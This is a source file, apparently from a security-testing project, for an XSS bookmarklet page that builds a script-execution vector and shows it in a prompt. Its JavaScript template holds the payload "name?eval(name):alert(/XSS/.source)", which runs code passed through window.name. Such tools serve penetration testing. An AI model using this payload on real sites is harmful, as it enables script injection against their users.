-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathxss_bookmarklet.html
54 lines (54 loc) · 2.29 KB
/
xss_bookmarklet.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<!DOCTYPE html>
<html>
<head>
<title>XSS Bookmarklet</title>
<script src="base64.js"></script>
<script src="caps.js"></script>
<script>
var CONFIG = {
host: document.location.hostname,
// Interlude: An Example why JavaScript sucks ;)
path : (a=location.href.split("/")).slice(0, a.length-1).join("/") + "/",
debug: false,
res: {
// Type: content-type, either type/subtype or just type, not "type/*".
'text/html': 'samples/sample.html',
'text/plain': 'samples/sample.txt',
'text/javascript': 'samples/sample.js',
'text/css': 'samples/sample.css',
'application/font-woff': 'samples/brankovic.ttf',
// images
'image/svg+xml': 'samples/sample.svg',
'image/gif':'samples/sample.gif',
'image/jpeg': 'samples/sample.jpg', // ??
'image/jpg': 'samples/sample.jpg',
'image/png': 'samples/sample.png',
'video/mp4': 'samples/video.mp4',
'video/ogg': 'samples/video.ogv',
'audio/mpeg': 'samples/audio.mp3',
'audio/ogg': 'samples/audio.ogg',
// more to follow... :)
/* suggestions:
application/xml, jar (application/x-compressed,application/java-archivemime-type)
*/
},
}
Producer = ProducerModule();
// overwrite template-js code to include, this one avoids quotes and spaces
Producer.mediaCache['samples/sample.js'] = "name?eval(name):alert(/XSS/.source)"
console.log("TODO: Change this config when the config in main.js changes") //TODO FIXME XXX
window.onload = function() {
var vector;
// this avoids racing with the Producer's internal init() function, that fills the mediaCache
while (vector == undefined) {
try {
vector = Producer.getNewVector("CAP_EXECUTE_SCRIPT");
} catch(e) { }
}
// Go back to the previous page, but wait for the prompt..
window.history.go( prompt("XSS Vector", vector) ? -1 : -1);
}
</script>
</head>
<body></body>
</html>